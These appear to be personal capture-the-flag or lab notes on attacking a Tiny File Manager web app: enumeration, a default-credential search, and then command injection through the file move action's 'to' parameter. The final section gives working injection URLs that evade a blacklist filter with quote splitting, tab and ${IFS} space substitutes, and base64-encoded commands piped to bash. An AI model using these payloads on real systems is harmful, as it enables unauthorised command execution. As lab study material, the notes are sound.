# Initial Enum - `ping` test ![[images/Pasted image 20260106192041.png]] - `nmap` scan ![[images/Pasted image 20260106192048.png]] - visit page ![[images/Pasted image 20260106191947.png]] - HTTP GET request ![[images/Pasted image 20260106192012.png]] - source code re: fields - I don't see any front-end validation![[images/Pasted image 20260106192151.png]] # test - user `test` for username and password - we have an error message![[images/Pasted image 20260106192258.png]] - also shown in GET request ![[images/Pasted image 20260106192358.png]] - note that a cookie is being used - we also have a POST request wih the cookie ![[images/Pasted image 20260106192432.png]] # OSINT - Do some googling on `tiny file manager` - here is the description on Github ![[images/Pasted image 20260106192853.png]] - Default username noted ![[images/Pasted image 20260106192917.png]] - Neither of the defaults worked ![[images/Pasted image 20260106193015.png]]![[images/Pasted image 20260106193023.png]] - Github shows the `tinyfilemanager.php` file - password hashes are leveraged ![[images/Pasted image 20260106193533.png]] # use provided credentials - visit page ![[images/Pasted image 20260106194441.png]] - source code re: new file creation ![[images/Pasted image 20260106194618.png]] # let's try to go back to initial login and inject a command ## test injection operations - `;` - failure with both username and password - NOTE: character being URL encoded - `|` - failure with both username and password - `&` - failure with both username and password - `||` - failure with both username and password - `&&` ## hint indicates that its easier to inject command at end instead of middle - focus on password field - rerun URL encoded injection operators with `id` - all failures # go back to page after login - turn off burp proxy to see page properly ![[images/Pasted image 20260106201313.png]] - try copy action ![[images/Pasted image 20260106201337.png]] - try to select `/tmp` - NOTE: URL changed![[images/Pasted image 20260106201400.png]] - select copy ![[images/Pasted image 20260106201422.png]] - visit `/tmp` ![[images/Pasted image 20260106201501.png]] - try move action - works with `tmp` selected ![[images/Pasted image 20260106201738.png]] - try without `tmp` selected; we get the following error message ![[images/Pasted image 20260106201717.png]] - Send the above error to repeater and note the error line location in the response - line 733 ![[images/Pasted image 20260106202034.png]] - NOTE: The backend is most likely using a `mv` command, and if an error occurs, it prints it out; therefore, this may be abused to capture command output # Determine injection point - try to inject a test command such as `whoami` or `id` in conjunction with the `&` in the default URL ![[images/Pasted image 20260106203502.png]] - test at first `&` - we are getting a file related error and not an invalid command error ![[images/Pasted image 20260106203655.png]] ```bash /index.php?to=&whoami&from=51459716.txt&finish=1&move=1 ``` # Successful command injection - single quotes doesn't work with `cat` but double quotes do for command blacklist filter - `%09` tab character can also be replaced with `${IFS}` to bypass space filter ```bash /index.php?to=tmp%09%26c"a"t%09${PATH:0:1}flag.txt&from=51459716.txt&finish=1&move=1 ``` - we can also use base64 encoding for the `cat /flag.txt` command portion - base64 encode command ![[images/Pasted image 20260106204618.png]] - use below payload ```bash /index.php?to=tmp%09%26bash<<<$(base64%09-d<<<Y2F0IC9mbGFnLnR4dA==)&from=51459716.txt&finish=1&move=1 ``` ![[images/Pasted image 20260106205253.png]]